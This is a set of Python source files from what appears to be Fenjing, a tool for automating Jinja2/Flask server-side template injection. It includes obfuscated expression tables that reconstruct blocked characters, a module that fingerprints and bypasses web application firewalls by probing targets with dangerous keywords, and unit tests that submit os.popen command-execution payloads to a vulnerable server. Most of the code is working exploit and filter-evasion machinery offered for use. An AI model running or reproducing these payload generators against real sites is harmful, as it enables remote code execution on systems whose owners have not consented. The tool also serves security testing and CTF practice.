    "lipsum.__doc__|length": 43,
    "namespace.__doc__|length": 126,
    "joiner|urlencode|wordcount": 7,
    "namespace|escape|count": 46,
    "cycler|escape|urlencode|count": 65,
    "namespace|escape|urlencode|escape|urlencode|count": 90,
    (
        "cycler|escape|urlencode|escape|urlenc"
        + "ode|escape|urlencode|escape|urlencode|count"
    ): 131,
    "lipsum|escape|urlencode|list|escape|urlencode|count": 2015,
}

context_payloads_exprs_py3 = {
    "1.__mod__.__doc__.__getitem__(11)": "%",
    (
        "({0:1}|safe).replace((1|safe).rjust(2),"
        + "cycler.__name__|batch(3)|first|last).format(((9,9,9,1,9)|sum))"
    ): "%",
    (
        "(lipsum[((({}|select()|trim|list)[24]))*2+"
        + "dict(globals=x)|join+((({}|select()|trim|list)[24]))*2][((({}|select()"
        + "|trim|list)[24]))*2+dict(builtins=x)|join+((({}|select()|trim|list"
        + ")[24]))*2][dict(chr=x)|join](37))"
    ): "%",
    "({}|select()|trim|list)[24]": "_",
    "{}|select()|trim|list|batch(25)|first|last": "_",
    "{}|select()|trim|list|attr(dict(po=x,p=x)|join)(24)": "_",
    "{}|escape|first|count": 1,
    "{}|escape|urlencode|count": 6,
    "{}|escape|list|escape|count": 26,
    "{}|escape|urlencode|list|escape|urlencode|count": 178,
}

digit_looks_similiar = {
    "0": "o",
    "1": "i",
    "2": "z",
    "3": "e",
    "4": "a",
    "5": "s",
    "6": "b",
    "7": "t",
    "8": "x",
    "9": "q",
}


def digit_to_similiar_alpha(s: str) -> str:
    """将字符串中的数字转换为形状类似的字母

    Args:
        s (str): 需要转换的字符串

    Returns:
        str: 转化结果
    """
    for d, c in digit_looks_similiar.items():
        s = s.replace(d, c)
    return s


def filter_by_waf(
    context_payloads: ContextPayloads, waf: Callable[[str], bool]
) -> ContextPayloads:
    """根据WAF函数去除所有不能通过WAF的payload

    Args:
        context_payloads (ContextPayloads): 需要过滤的ContextPayload
        waf (Callable[[str], bool]): WAF函数，

    Returns:
        ContextPayloads: 过滤后的ContextPayload
    """
    return {payload: d for payload, d in context_payloads.items() if waf(payload)}


def filter_by_used_context(
    context_payloads: ContextPayloads, used_context: Iterable
) -> ContextPayloads:
    """根据已经使用的变量列表过滤上下文payload

    Args:
        context_payloads (ContextPayloads): 需要过滤的ContextPayload
        used_context (Iterable): 使用的变量名

    Returns:
        ContextPayloads: 过滤后的ContextPayloads
    """
    return {
        payload: d
        for payload, d in context_payloads.items()
        if any(var_name in used_context for var_name in d.keys())
    }


class ContextVariableManager:
    """管理上下文变量payload的工具类
    这个类管理类似{%set xxx%}的payload以及其对应的变量名与值
    """

    def __init__(self, waf: WafFunc, context_payloads: ContextPayloads):
        self.waf = waf
        self.context_payloads = context_payloads.copy()
        self.payload_dependency = {}
        self.prepared = False

    def do_prepare(self):
        """准备函数，会被自动调用"""
        if self.prepared:
            return
        self.context_payloads = filter_by_waf(self.context_payloads, self.waf)
        self.prepared = True

    def is_variable_exists(self, var_name: str) -> bool:
        """返回变量是否存在

        Args:
            var_name (str): 变量名

        Returns:
            bool: 是否存在
        """
        all_vars = set(v for d in self.context_payloads.values() for v in d)
        return var_name in all_vars

    def generate_related_variable_name(self, value: Any) -> Union[str, None]:
        """生成一个和value相关的变量名，如globals => gl或go，用于提升最终payload的可读性

        Args:
            value (str): 和变量名相关的字符串

        Returns:
            Union[str, None]: 结果
        """
        value = "".join(re.findall("[a-zA-Z0-9]+", repr(value))).lower()
        value = digit_to_similiar_alpha(value)
        if len(value) < 2:
            return None
        for c in value[1:]:
            var_name = value[0] + c
            if self.is_variable_exists(var_name):
                continue
            if not self.waf(var_name):
                continue
            return var_name
        return None

    def generate_random_variable_name(self) -> Union[str, None]:
        """生成一个可能的变量名

        Returns:
            Union[str, None]: 可能的变量名，失败时返回None
        """
        var_name = None

        for i in range(20):
            # 变量名的长度由尝试次数决定
            var_length = 2 if i < 10 else 3
            name = "".join(random.choices(string.ascii_lowercase, k=var_length))
            if self.is_variable_exists(name):
                continue
            if not self.waf(name):
                continue
            var_name = name
            break
        return var_name

    def add_payload(
        self,
        payload: str,
        variables: Context,
        depends_on: Union[Context, None] = None,
        check_waf: bool = True,
    ) -> bool:
        """将payload加入context payloads中

        Args:
            payload (str): 需要加入的payload
            variables (Context): payload中存储的一系列变量，不能和已有的重复
            depends_on (Union[Context, None], optional): payload依赖的变量. Defaults to None.
            check_waf (bool, optional): 是否使用waf函数检查payload是否合法. Defaults to True.

        Returns:
            bool: 是否加入成功
        """
        if not self.prepared:
            self.do_prepare()
        if check_waf and not self.waf(payload):
            return False
        if any(self.is_variable_exists(v) for v in variables):
            return False
        if depends_on is not None:
            if not all(self.is_variable_exists(v) for v in depends_on):
                notfound_vars = [
                    v for v in depends_on if not self.is_variable_exists(v)
                ]
                logger.warning("Variables not found: %s", repr(notfound_vars))
                return False
            self.payload_dependency[payload] = depends_on
        self.context_payloads[payload] = variables
        return True

    def get_payload(self, used_context: Context) -> str:
        """根据使用了的变量生成对应的payload

        Args:
            used_context (Context): 使用了的变量

        Raises:
            RuntimeError: 输入变量依赖了不存在的变量

        Returns:
            str: 包含对应变量的payload
        """
        if not self.prepared:
            self.do_prepare()
        answer = ""
        to_add_vars = list(used_context.keys())
        added_vars = set()
        while to_add_vars:
            to_add = to_add_vars.pop(0)

            if to_add in added_vars:
                continue
            if not self.is_variable_exists(to_add):
                raise RuntimeError(f"Variable {to_add} not found")

            payload = next(
                payload for payload, d in self.context_payloads.items() if to_add in d
            )
            if payload in self.payload_dependency:
                # 检测依赖的变量是否都加入了
                vars_name = list(self.payload_dependency[payload].keys())
                assert all(self.is_variable_exists(v) for v in vars_name)
                if not all(v in added_vars for v in vars_name):
                    to_add_vars += list(self.payload_dependency[payload])
                    to_add_vars.append(to_add)
                    continue

            answer += payload
            added_vars.add(to_add)
        return answer

    def get_context(self) -> Context:
        """输出当前包含的变量

        Returns:
            Context: 所有包含的payload
        """
        return {
            var_name: var_value
            for _, d in self.context_payloads.items()
            for var_name, var_value in d.items()
        }


def get_context_vars_manager(waf: WafFunc, options: Options) -> ContextVariableManager:
    """根据waf函数和对应选项生成ContextVariableManager

    Args:
        waf (WafFunc): 对应的waf函数
        options (Options): 对应的选项

    Returns:
        ContextVariableManager: 生成的实例
    """
    context_payloads = context_payloads_stmts.copy()
    if options.python_version == PythonEnvironment.PYTHON3:
        context_payloads.update(context_payloads_stmts_py3)
    manager = ContextVariableManager(waf, context_payloads)
    manager.do_prepare()

    set_stmt_pattern = None  # sth like "{%set NAME=EXPR%}"
    for pattern, test_pattern in SET_STMT_PATTERNS:
        if waf(test_pattern):
            set_stmt_pattern = pattern
            break

    if not set_stmt_pattern:
        return manager

    exprs = context_payloads_exprs.copy()
    if options.python_version == PythonEnvironment.PYTHON3:
        exprs.update(context_payloads_exprs_py3)
    for expr, value in exprs.items():
        if not waf(expr):
            continue
        name = manager.generate_random_variable_name()
        if not name:
            continue
        stmt = set_stmt_pattern.replace("NAME", name).replace("EXPR", expr)
        _ = manager.add_payload(stmt, {name: value})

    return manager



import sys


sys.path.append("..")  # noqa

from fenjing.form import get_form
from fenjing.requester import HTTPRequester

from fenjing.submitter import FormSubmitter  # noqa

import fenjing
import logging
import os

from fenjing import FullPayloadGen, const, options
import unittest
import random
import jinja2

fenjing.full_payload_gen.logger.setLevel(logging.ERROR)
fenjing.payload_gen.logger.setLevel(logging.ERROR)

VULUNSERVER_ADDR = os.environ.get("VULUNSERVER_ADDR", "http://127.0.0.1:5000")


def get_full_payload_gen(
    blacklist,
    detect_mode=fenjing.const.DetectMode.ACCURATE,
    environment=fenjing.const.TemplateEnvironment.FLASK,
):
    return FullPayloadGen(
        lambda x: all(word not in x for word in blacklist),
        options=options.Options(detect_mode=detect_mode, environment=environment),
    )


class FullPayloadGenTestCaseSimple(unittest.TestCase):
    def setUp(self) -> None:
        super().setUp()
        self.blacklist = [
            "[",
            "]",
        ]
        self.full_payload_gen = get_full_payload_gen(self.blacklist)
        self.subm = FormSubmitter(
            url=VULUNSERVER_ADDR,
            form=get_form(action="/", inputs=["name"], method="GET"),
            target_field="name",
            requester=HTTPRequester(interval=0.01),
        )

    def test_string(self):
        strings = [
            "123",
            "asdf",
            "__dunder__",
            "__import__('os').popen('echo test_command/$(ls / | base64 -w)').read()",
        ]
        for string in strings:
            payload, _ = self.full_payload_gen.generate(const.STRING, string)
            # self.assertIsNotNone(payload)
            assert payload is not None
            # why?
            # cause the stupid type checker thinks the 'payload' below would still be None
            resp = self.subm.submit(payload)
            assert resp is not None
            self.assertIn(string, resp.text)
            for word in self.blacklist:
                self.assertNotIn(word, payload)

    def test_os_popen_read(self):
        payload, _ = self.full_payload_gen.generate(
            const.OS_POPEN_READ, "echo fen  jing;"
        )
        # self.assertIsNotNone(payload)
        assert payload is not None
        # why?
        # cause the stupid type checker thinks the 'payload' below would still be None
        resp = self.subm.submit(payload)
        assert resp is not None
        self.assertIn("fen jing", resp.text)
        for word in self.blacklist:
            self.assertNotIn(word, payload)


class FullPayloadGenTestCaseHard(FullPayloadGenTestCaseSimple):
    def setUp(self) -> None:
        super().setUp()
        self.blacklist = [
            "config",
            "self",
            "g",
            "os",
            "class",
            "length",
            "mro",
            "base",
            "lipsum",
            "[",
            '"',
            "'",
            "_",
            ".",
            "+",
            "~",
            "{{",
            "0",
            "1",
            "2",
            "3",
            "4",
            "5",
            "6",
            "7",
            "8",
            "9",
            "０",
            "１",
            "２",
            "３",
            "４",
            "５",
            "６",
            "７",
            "８",
            "９",
        ]
        self.full_payload_gen = get_full_payload_gen(self.blacklist)


class FullPayloadGenTestCaseHard2(FullPayloadGenTestCaseSimple):
    def setUp(self) -> None:
        super().setUp()
        self.blacklist = [
            "_",
            "'",
            '"',
            ".",
            "system",
            "os",
            "eval",
            "exec",
            "popen",
            "subprocess",
            "posix",
            "builtins",
            "namespace",
            "open",
            "read",
            "\\",
            "self",
            "mro",
            "base",
            "global",
            "init",
            "/",
            "00",
            "chr",
            "value",
            "get",
            "url",
            "pop",
            "import",
            "include",
            "request",
            "{{",
            "}}",
            '"',
            "config",
            "=",
        ]
        self.full_payload_gen = get_full_payload_gen(self.blacklist)


class FullPayloadGenTestCaseStringFormat1(FullPayloadGenTestCaseSimple):
    def setUp(self) -> None:
        super().setUp()
        self.blacklist = [
            "_",
            "'",
            '"',
            ".",
            "system",
            "os",
            "eval",
            "exec",
            "popen",
            "subprocess",
            "posix",
            "builtins",
            "namespace",
            "open",
            "read",
            "\\",
            "=",
            "%",
        ]
        self.full_payload_gen = get_full_payload_gen(self.blacklist)


class FullPayloadGenTestCaseStringFormat2(FullPayloadGenTestCaseSimple):
    def setUp(self) -> None:
        super().setUp()
        self.blacklist = [
            "_",
            "'",
            '"',
            ".",
            "system",
            "os",
            "eval",
            "exec",
            "popen",
            "subprocess",
            "posix",
            "builtins",
            "namespace",
            "open",
            "read",
            "\\",
            "=",
            "%",
            "|format",
        ]
        self.full_payload_gen = get_full_payload_gen(self.blacklist)


class FullPayloadGenTestCaseSubs(FullPayloadGenTestCaseSimple):
    def setUp(self) -> None:
        super().setUp()
        self.blacklist = [
            "+",
            "~",
            "_",
            '"',
            "'",
            "sum",
            "dict",
            "length",
            "1",
            "2",
            "3",
            "4",
            "5",
        ]
        self.full_payload_gen = get_full_payload_gen(self.blacklist)


class FullPayloadGenTestCaseMul(FullPayloadGenTestCaseSimple):
    def setUp(self) -> None:
        super().setUp()
        self.blacklist = [
            "-",
            "~",
            "__",
            '"',
            "'",
            "sum",
            "dict",
            "length",
            "0",
            "1",
            "2",
            "3",
            "4",
        ]
        self.full_payload_gen = get_full_payload_gen(self.blacklist)


class FullPayloadGenTestCaseRandom(FullPayloadGenTestCaseSimple):
    def setUp(self) -> None:
        super().setUp()
        self.blacklists = [
            random.sample(
                [
                    "config",
                    "self",
                    "g",
                    "os",
                    "class",
                    "length",
                    "mro",
                    "base",
                    "lipsum",
                    "[",
                    '"',
                    "'",
                    "_",
                    ".",
                    "+",
                    "-",
                    "*",
                    "/",
                    " ",
                    "))",
                    "~",
                    "{{",
                    "0",
                    "1",
                    "2",
                    "3",
                    "4",
                    "5",
                    "6",
                    "7",
                    "8",
                    "9",
                    "０",
                    "１",
                    "２",
                    "３",
                    "４",
                    "５",
                    "６",
                    "７",
                    "８",
                    "９",
                ],
                k=25,
            )
            for _ in range(50)
        ]
        self.full_payload_gens = [
            get_full_payload_gen(
                blacklist,
                detect_mode=random.choice(
                    [
                        fenjing.const.DetectMode.ACCURATE,
                        fenjing.const.DetectMode.FAST,
                    ]
                ),
                environment=fenjing.const.TemplateEnvironment.JINJA2,
            )
            for blacklist in self.blacklists
        ]

    def test_os_popen_read(self):
        for full_payload_gen, blacklist in zip(self.full_payload_gens, self.blacklists):
            payload, _ = full_payload_gen.generate(
                const.OS_POPEN_READ, "echo fen  jing;"
            )
            assert payload is not None, repr(blacklist)
            try:
                result = jinja2.Template(payload).render()
            except Exception as exc:
                raise RuntimeError(repr(blacklist)) from exc
            assert "fen jing" in result, repr(blacklist)



"""根据指定的表单生成对应的WAF函数

"""

import logging
import random
import string
import traceback
import time
import re

from copy import copy
from collections import Counter, namedtuple
from functools import lru_cache
from typing import Dict, Callable, Tuple, Union, List

from .const import (
    DetectMode,
    ReplacedKeywordStrategy,
    DANGEROUS_KEYWORDS,
    WafFunc,
)
from .colorize import colored
from .submitter import Submitter
from .options import Options

logger = logging.getLogger("waf_func_gen")
Result = namedtuple("Result", "payload_generate_func input_field")

dangerous_keywords = copy(DANGEROUS_KEYWORDS)

random.shuffle(dangerous_keywords)
render_error_keywords = [
    "TemplateSyntaxError",
    "Internal Server Error",
    "Traceback (most recent call last):",
]


def grouped_payloads(size=3, sep="") -> List[str]:
    """将所有payload按照size个一组拼接在一起
    即：['a', 'b', 'c', 'd'] -> ['ab', 'cd']

    Args:
        size (int, optional): 拼接的size. Defaults to 3.

    Returns:
        List[str]: 拼接结果
    """
    return [
        sep.join(dangerous_keywords[i : i + size])  # flake8: noqa
        for i in range(0, len(dangerous_keywords), size)
    ]


def removeprefix_string(text: str, prefix: str) -> str:
    """兼容python 3.9及以下的removeprefix函数

    Args:
        text (str): text
        prefix (str): 需要去除的prefix

    Returns:
        str: 处理结果
    """
    if text.startswith(prefix):
        return text[len(prefix) :]
    return text


def get_next_p(b: str) -> List[int]:
    """KMP算法中，获取字符串B的next数组的算法过程

    Args:
        b (str): 字符串B，KMP匹配的目标

    Returns:
        List[int]: next数组，定义与KMP相同
    """
    answer = []
    for i, c in enumerate(b):
        if i == 0:
            answer.append(-1)
            continue
        p = answer[i - 1]
        while p >= 0 and b[p + 1] != c:
            assert answer[p] < p
            p = answer[p]

        if c == b[p + 1]:
            answer.append(p + 1)
        else:
            answer.append(p)
    return answer


def kmp(a: str, b: str) -> Tuple[int, Union[int, None]]:
    """KMP算法，在A中寻找B的最长匹配子串

    Args:
        a (str): KMP中的字符串A
        b (str): KMP中的字符串B

    Returns:
        Tuple[int, Union[int, None]]: 最长匹配子串的结尾长度和位置
    """
    logger.debug("kmp(len(a)=%d, len(b)=%d)", len(a), len(b))
    if b == "":
        return 0, None
    next_p = get_next_p(b)
    max_answer, max_answer_pos = 0, None
    j = -1
    for i, c in enumerate(a):
        while j >= 0 and b[j + 1] != c:
            assert next_p[j] < j
            j = next_p[j]
        if c == b[j + 1]:
            j += 1
        if j + 1 > max_answer:
            max_answer = j + 1
            max_answer_pos = i

        if j == len(b) - 1:
            j = -1
        logger.debug("%d, %s, %d", i, c, j)
    return max_answer, max_answer_pos


def find_pieces(resp_text, payload):
    """从HTTP响应的正文和对应的payload中分析出可能被替换的关键字

    Args:
        resp_text (str): HTTP响应正文
        payload (str): payload

    Returns:
        List[str]: 可能被替换的关键字
    """
    assert len(resp_text) < 1e5 and len(payload) < 1e5  # perf limit
    logger.debug("find_pieces(%s, %s)", resp_text[:20], payload[:20])
    max_answer, max_answer_pos = kmp(resp_text, payload)
    logger.debug("%d, %s", max_answer, str(max_answer_pos))
    if max_answer <= 2 or max_answer_pos is None:
        logger.debug("max answer too low")
        return []

    resp_text_matched = resp_text[max_answer_pos - max_answer + 1 : max_answer_pos + 1]
    resp_text_unmatched, payload_unmatched = (
        resp_text[max_answer_pos + 1 :],
        payload[len(resp_text_matched) :],
    )
    if payload_unmatched == "":
        logger.debug("read payload done")
        return []

    max_answer_unmatched, max_answer_pos_unmatched = kmp(
        payload_unmatched, resp_text_unmatched
    )

    if max_answer_pos_unmatched is None:
        return []

    payload_unmatched_before = payload_unmatched[
        : max_answer_pos_unmatched - max_answer_unmatched + 1
    ]
    resp_text_next = removeprefix_string(resp_text_unmatched, payload_unmatched_before)
    payload_next = removeprefix_string(payload_unmatched, payload_unmatched_before)

    assert len(resp_text_next) < len(resp_text) and len(payload_next) < len(payload)
    return [
        payload_unmatched_before,
    ] + find_pieces(resp_text_next, payload_next)


def combine_waf(waf_funcs):
    def new_waf_func(s):
        return all(waf(s) for waf in waf_funcs)

    return new_waf_func


class WafFuncGen:
    """
    根据指定的Submitter(表单submitter或者路径submitter)生成对应的WAF函数
    其会使用一系列经常被waf的payload进行测试，然后根据返回页面的哈希判断其他payload是否被waf
    """

    def __init__(
        self,
        submitter: Submitter,
        callback: Union[Callable[[str, Dict], None], None] = None,
        options: Union[Options, None] = None,
    ):
        self.subm = submitter
        self.callback: Callable[[str, Dict], None] = (
            callback if callback else (lambda x, y: None)
        )
        self.options = options if options else Options()

    def waf_page_hash(self) -> List[int]:
        """使用危险的payload测试对应的input，得到一系列响应后，求出响应中最常见的几个hash

        Returns:
            List[int]: payload被waf后页面对应的hash
        """
        test_keywords = None
        if self.options.detect_mode == DetectMode.ACCURATE:
            test_keywords = (
                wrapper.replace("PAYLOAD", word)
                for word in grouped_payloads(2) + dangerous_keywords
                for wrapper in [
                    "PAYLOAD",
                    "PAYLOADPAYLOAD",
                    "{{PAYLOAD}}PAYLOAD",
                    "{%print PAYLOAD%}PAYLOAD",
                    "{%print(PAYLOAD)%}PAYLOAD",
                ]
            )
        else:
            test_keywords = (
                wrapper.replace("PAYLOAD", word)
                for word in grouped_payloads(4)
                for wrapper in [
                    "PAYLOADPAYLOAD",
                    "{{PAYLOAD}}PAYLOAD",
                ]
            )
        hashes: List[int] = []
        for keyword in test_keywords:
            result = self.subm.submit(keyword)
            if result is None:
                logger.info(
                    "Submit %s for %s",
                    colored("yellow", "failed"),
                    colored("yellow", repr(keyword)),
                )
                continue
            status_code, text = result
            logger.info(
                "Testing dangerous keyword %s with response %s",
                colored("yellow", repr(keyword)),
                colored(
                    "blue",
                    repr(text) if len(text) < 100 else repr(text[:100]) + "......",
                ),
            )
            if status_code == 500 and "Internal Server Error" in text:
                continue
            hashes.append(hash(text))

        return [k for k, v in Counter(hashes).items() if v >= 2]

    def long_param_hash(self) -> List[int]:
        """测试目标是否会waf过长的payload

        Returns:
            List[int]: 过长payload页面的hash
        """
        logger.info("Testing long payloads...")
        keywords = [
            "".join(random.choices(string.ascii_lowercase, k=5)) * 40 for _ in range(20)
        ]
        hashes = []
        for keyword in keywords:
            result = self.subm.submit(keyword)
            if result is None:
                logger.info(
                    "Submit %s, continue",
                    colored("yellow", "failed"),
                )
                continue
            status_code, text = result
            if status_code == 500:
                continue
            hashes.append(hash(text))
        hashes_uniq = list(set(hashes))
        if len(hashes_uniq) <= 3:
            logger.warning(
                "%s detected!, maybe you should try `--eval-args-payload`"
                + " option to generate shorter payload.",
                colored("red", "Long payload waf", bold=True),
            )
            time.sleep(2)
        return [k for k, v in Counter(hashes).items() if v >= 2]

    def waf_keywords(self, waf_hashes: List[int]) -> List[str]:
        """根据Waf的hashes求出会被waf的keyword

        Args:
            waf_hashes (List[int]): waf页面的hash

        Returns:
            List[str]: 找到的被waf的keyword
        """
        result: List[str] = []
        wrappers = [
            "PAYLOADPAYLOADPAYLOAD",
        ]

        def keyword_passed(w):

            for wrapper in wrappers:
                payload = wrapper.replace("PAYLOAD", w)
                logger.info(
                    "Checking dangerous payload %s",
                    colored("yellow", repr(payload)),
                )
                result = self.subm.submit(payload)
                if not result:
                    return False
                status, text = result
                if status == 500:
                    continue
                if hash(text) in waf_hashes:
                    return False
            return True

        if keyword_passed("{{}}"):
            wrappers.append("{{PAYLOAD}}")
        for whiltespace in (
            [" ", "\t", "\n"]
            if self.options.detect_mode == DetectMode.ACCURATE
            else [" "]
        ):
            if keyword_passed(" {{ }} ".replace(" ", whiltespace)):
                wrappers.append(" {{ PAYLOAD }} ".replace(" ", whiltespace))
            if keyword_passed("{%print %}".replace(" ", whiltespace)):
                wrappers.append("{%print PAYLOAD%}".replace(" ", whiltespace))
            if keyword_passed(" {%print %} ".replace(" ", whiltespace)):
                wrappers.append(" {%print PAYLOAD %} ".replace(" ", whiltespace))

        for _ in range(10):
            kw = "".join(random.choices(string.ascii_lowercase, k=4))
            if keyword_passed(kw):
                wrappers.append(kw + "PAYLOAD")
                break

        # we decide to test every keyword by batches
        size = int(len(dangerous_keywords) ** 0.3) + 1
        for i in range(0, len(dangerous_keywords), size):
            l = dangerous_keywords[i : i + size]
            random.shuffle(l)
            if keyword_passed("".join(l)):
                continue
            for word in l:
                if not keyword_passed(word):
                    result.append(word)
        if result:
            logger.info(
                "These keywords might get %s: %s",
                colored("yellow", "banned", bold=True),
                colored("yellow", repr(result)),
            )
        return result

    def replaced_keyword(self) -> List[str]:
        """检测出所有可能被替换的keyword

        Returns:
            List[str]: 所有可能被替换的keyword
        """
        extra = "".join(random.choices(string.ascii_lowercase, k=4))
        test_payloads = (
            dangerous_keywords
            if self.options.detect_mode == DetectMode.ACCURATE
            else grouped_payloads(4, sep=extra)
        )
        keywords = []
        for keyword in test_payloads:
            # 如果extra的开头或结尾和payload的相同，被替换后可能会因为错误拼合导致检测失效
            while extra[0] == keyword[0] or extra[-1] == keyword[-1]:
                extra = "".join(random.choices(string.ascii_lowercase, k=4))
            payload = extra + keyword + extra
            logger.info(
                "Testing keyword replacement: %s",
                colored("yellow", repr(payload)),
            )
            result = self.subm.submit(payload)
            if result is None:
                logger.info(
                    "Submit %s for %s",
                    colored("yellow", "failed"),
                    colored("yellow", repr(payload)),
                )
                continue

            status_code, text = result
            if status_code == 500:
                continue
            if len(text) > 5e4:
                continue
            try:
                payload_replaced_keyword = find_pieces(text, payload)
            except Exception:
                traceback.print_exc()
                continue
            if payload_replaced_keyword:
                payload_replaced_keyword = list(set(payload_replaced_keyword))
                if len(payload_replaced_keyword) > 10:
                    logger.info(
                        "Replaced keywords found, ignore because it's too long (length=%d)",
                        len(payload_replaced_keyword),
                    )
                else:
                    keywords += payload_replaced_keyword
            if keyword not in text and extra in text:
                keywords.append(keyword)
        keywords = list(set(keywords))
        if keywords:
            logger.info(
                "These keywords might get %s: %s",
                colored("yellow", "replaced", bold=True),
                colored("yellow", repr(keywords)),
            )
        return keywords

    def doubletapping(self, payload: str, keywords: List[str]):
        if not keywords:
            return payload
        logger.info(
            "Perform %s for payload: %s",
            colored("blue", "doubletapping"),
            colored("yellow", payload),
        )
        exist_keywords = [w for w in keywords if w in payload]
        replacement = {
            w: w[: len(w) // 2] + w + w[len(w) // 2 :]
            for w in exist_keywords
            if len(w) >= 2
        }
        for k, v in sorted(replacement.items(), key=lambda item: len(item[0])):
            payload = payload.replace(k, v)
        return payload

    def generate(self) -> WafFunc:
        """生成WAF函数

        Returns:
            WafFunc: WAF函数
        """
        waf_hashes = self.waf_page_hash()
        waf_keywords = self.waf_keywords(waf_hashes)
        replaced_keyword = self.replaced_keyword()
        long_param_hashes = self.long_param_hash()
        long_param_hashes = [h for h in long_param_hashes if h not in waf_hashes]
        if (
            self.options.replaced_keyword_strategy
            == ReplacedKeywordStrategy.DOUBLETAPPING
        ):
            self.subm.add_tamperer(lambda s: self.doubletapping(s, replaced_keyword))

        # 随着检测payload一起提交的附加内容
        # content: 内容本身，passed: 内容是否确认可以通过waf
        extra_content, extra_passed = (
            "".join(random.choices(string.ascii_lowercase, k=4)),
            False,
        )
        while any(w in extra_content for w in replaced_keyword):
            extra_content = "".join(random.choices(string.ascii_lowercase, k=4))

        # WAF函数，只有在payload一定可以通过WAF时才返回True
        @lru_cache(10000)
        def waf_func(value):
            nonlocal extra_content, extra_passed, replaced_keyword
            payload = extra_content + value
            for _ in range(5):
                if (
                    self.options.replaced_keyword_strategy
                    == ReplacedKeywordStrategy.AVOID
                    and any(w in payload for w in replaced_keyword)
                ):
                    logger.debug("payload含有被替换的keyword")
                    return False
                result = self.subm.submit(payload)
                if result is None:
                    logger.debug("发送请求失败")
                    return False
                # status_code, text = result
                # 遇到500时，判断是否是Jinja渲染错误，是则返回True
                if result.status_code == 500:
                    logger.debug("目标渲染payload失败")
                    return any(w in result.text for w in render_error_keywords)
                # payload过长
                hash_text = hash(result.text)
                if hash_text in long_param_hashes:
                    logger.debug("payload过长")
                    return False
                # 无完全回显
                if (
                    re.match(r"^[a-zA-Z0-9-_'\"!%=\+\-\*\/\[\], .()]+$", payload)
                    and payload not in result.text
                ):
                    logger.debug(
                        "payload足够简单但却没有完全回显: %s", colored("blue", payload)
                    )
                    return False
                # 含有被waf的keyword
                # 如果这个payload触发了500错误则说明payload被正常渲染了，先前找到的keyword有误，
                # 此时应该返回true
                if any(w in payload for w in waf_keywords):
                    logger.debug(
                        "payload %s 含有被waf的keyword %s",
                        colored("blue", payload),
                        repr([w for w in waf_keywords if w in payload]),
                    )
                    return False
                # 产生回显
                if extra_content in result.text:
                    logger.debug("payload产生回显")
                    return True
                # 产生关键词替换
                replaced_list = find_pieces(result.text, payload)
                if replaced_list:
                    logger.debug(
                        "发现了新的关键词替换：%s",
                        colored("yellow", repr(replaced_list)),
                    )
                    replaced_keyword += replaced_list
                    # 如果策略为“忽略”则返回True, 否则返回False
                    return (
                        self.options.replaced_keyword_strategy
                        == ReplacedKeywordStrategy.IGNORE
                    )
                # 去除下方的规则，因为如果我们没有fuzz出所有的waf页面，而此时extra_content
                # 不在waf页面中的话，我们应该更加保守地认为payload应该是被waf拦住了

                # # 页面的hash和waf页面的hash不相同
                # if hash(result.text) not in waf_hashes:
                #     logger.debug("页面的hash和waf页面的hash不相同")
                #     return True
                # 页面的hash和waf的相同，但是用户要求检测模式为快速
                # 因此我们不检测是不是extra导致的waf，直接返回False
                if self.options.detect_mode == DetectMode.FAST:
                    logger.debug("快速模式直接返回False")
                    return False
                # 如果extra_content之前检测过，则可以确定不是它产生的问题，返回False
                if extra_passed:
                    logger.debug("extra_content已经检查，直接返回False")
                    return False
                # 检测是否是extra_content导致的WAF
                # 如果是的话更换extra_content并重新检测
                extra_content_result = self.subm.submit(extra_content)
                if extra_content_result is None:
                    continue
                if (
                    extra_content_result.status_code != 500
                    and hash(extra_content_result.text) in waf_hashes
                ):
                    logger.debug("extra_content存在问题，重新检查")
                    extra_content = "".join(random.choices(string.ascii_lowercase, k=4))
                    continue
                extra_passed = True
                logger.debug("回显失败，返回False")
                return False
            # 五次检测都失败，我们选择直接返回False
            return False

        return waf_func



"""webui后台的实现"""

import logging
import threading
import time
import webbrowser
import uuid

from urllib.parse import urlparse
from typing import Union
from os import environ
from platform import system

from flask import Flask, render_template, request, jsonify

from .const import (
    DetectMode,
    ReplacedKeywordStrategy,
    TemplateEnvironment,
    CALLBACK_GENERATE_FULLPAYLOAD,
    CALLBACK_GENERATE_PAYLOAD,
    CALLBACK_PREPARE_FULLPAYLOADGEN,
    CALLBACK_SUBMIT,
    CALLBACK_TEST_FORM_INPUT,
    APICODE_OK,
    APICODE_WRONG_INPUT,
    DEFAULT_USER_AGENT,
    OS_POPEN_READ,
)
from .cracker import Cracker
from .options import Options
from .form import get_form, Form
from .full_payload_gen import FullPayloadGen
from .requester import HTTPRequester
from .scan_url import yield_form
from .submitter import Submitter, FormSubmitter, PathSubmitter


logger = logging.getLogger("webui")
app = Flask(__name__)
tasks = {}


class CallBackLogger:
    """利用callback收集信息并以日志的形式保存的类"""

    def __init__(self, flash_messages, messages):
        self.flash_messages = flash_messages
        self.messages = messages

    def callback_prepare_fullpayloadgen(self, data):
        """收集FullPayloadGen准备好后的信息"""
        self.messages.append("上下文payload测试完毕。")
        if data["context"]:
            context_repr = ", ".join(
                f"{k}={repr(v)}" for k, v in data["context"].items()
            )
            self.messages.append(f"以下是在上下文中的值：{context_repr}")
        else:
            self.messages.append("没有上下文payload可以通过waf。。。")
        if not data["will_print"]:
            self.messages.append("生成的payload将不会具有回显。")

    def callback_generate_fullpayload(self, data):
        """收集FullPayloadGen生成payload的结果"""
        payload = (
            data["payload"]
            if len(data["payload"]) < 30
            else data["payload"][:30] + "..."
        )
        self.messages.append(f"分析完毕，为{data['gen_type']}生成payload: {payload}")
        if not data["will_print"]:
            self.messages.append("payload将不会产生回显")

    def callback_generate_payload(self, data):
        """收集PayloadGen生成payload的中间结果"""
        payload_repr = data["payload"]
        if len(payload_repr) > 100:
            payload_repr = payload_repr[:100] + "..."
        req = f"{data['gen_type']}({', '.join(repr(arg) for arg in data['args'])})"
        self.flash_messages.append(f"请求{req}对应的payload可以是{payload_repr}")

    def callback_submit(self, data):
        """收集表单的提交结果"""
        if not data["response"]:
            if data.get("type", None) == "form":
                self.flash_messages.append(
                    f"提交表单失败！输入为{data['inputs']}，表单为{data['form']}"
                )
            elif data.get("type", None) == "path":
                self.flash_messages.append(
                    f"提交payload失败！链接为{data['url']}，payload为{data['payload']}"
                )
            else:
                self.flash_messages.append("提交payload失败！")
        elif data.get("type", None) == "form":
            self.flash_messages.append(
                f"提交表单完成，返回值为{data['response'].status_code}，输入为{data['inputs']}，表单为{data['form']}"
            )
        else:
            self.flash_messages.append(
                f"提交payload完成，返回值为{data['response'].status_code}，提交payload为{data['payload']}"
            )

